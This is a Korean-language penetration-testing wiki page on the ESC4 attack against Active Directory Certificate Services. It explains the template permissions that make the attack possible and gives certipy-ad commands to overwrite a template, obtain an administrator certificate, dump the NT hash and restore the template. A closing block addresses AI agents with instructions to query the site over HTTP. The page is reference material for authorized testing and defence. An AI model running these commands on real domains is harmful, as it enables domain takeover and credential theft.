# ESC4 ESC4은 다음과 같은 속성들이 모두 만족할 때 가능한 ADCS 공격입니다.

속성	값
Authorized Signatures Required	0
Requires Manager Approval	False
Enrollment Rights	공격자가 컨트롤 가능한 객체 이하의 권한
User ACL Principals	공격자가 컨트롤 가능한 객체

템플릿에 대해서 높은 권한을 가진 계정을 탈취하는데 성공하면 템플릿의 속성을 ESC1에 취약하게 변경할 수 있습니다. ## Abuse

# 취약한 템플릿 열거
certipy-ad find -u '<username>' -p '<password>' -dc-ip '<dc-ip>' -vulnerable -stdout -enabled

# 템플릿 속성 변경
certipy-ad template -u '<username@domain>' -p '<password>' -dc-ip '<dc-ip>' -template '<template>' -write-default-configuration

# 템플릿을 통한 인증서 발급
certipy-ad req -u '<username@domain>' -p '<password>' -dc-ip '<dc-ip>' -target '<ca-fqdn>' -ca '<ca-name>' -template '<template>' -upn '<administrator@domain>' -sid '<sid>'

# 인증서로부터 nt해시 덤프
certipy-ad auth -pfx '<pfx>' -dc-ip '<dc-ip>'

# 템플릿 속성 복구
certipy-ad template -u '<username@domain>' -p '<password>' -dc-ip '<dc-ip>' -template '<template>' -write-configuration 'ESC4.json' -no-save

## Root Cause #### User ACL Principals 템플릿에 대해서 GenericAll, GenericWrite 권한이 있으면 해당 템플릿의 모든 속성을 ESC1에 적합하도록 변경할 수 있습니다. 악용을 위해 변경하는 속성들에 대한 설명은 [ESC1](/active-directory/adcs/esc1.md)을 참고하세요.

## References {% embed url="" %} {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.pentestwiki.com/active-directory/adcs/esc4.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.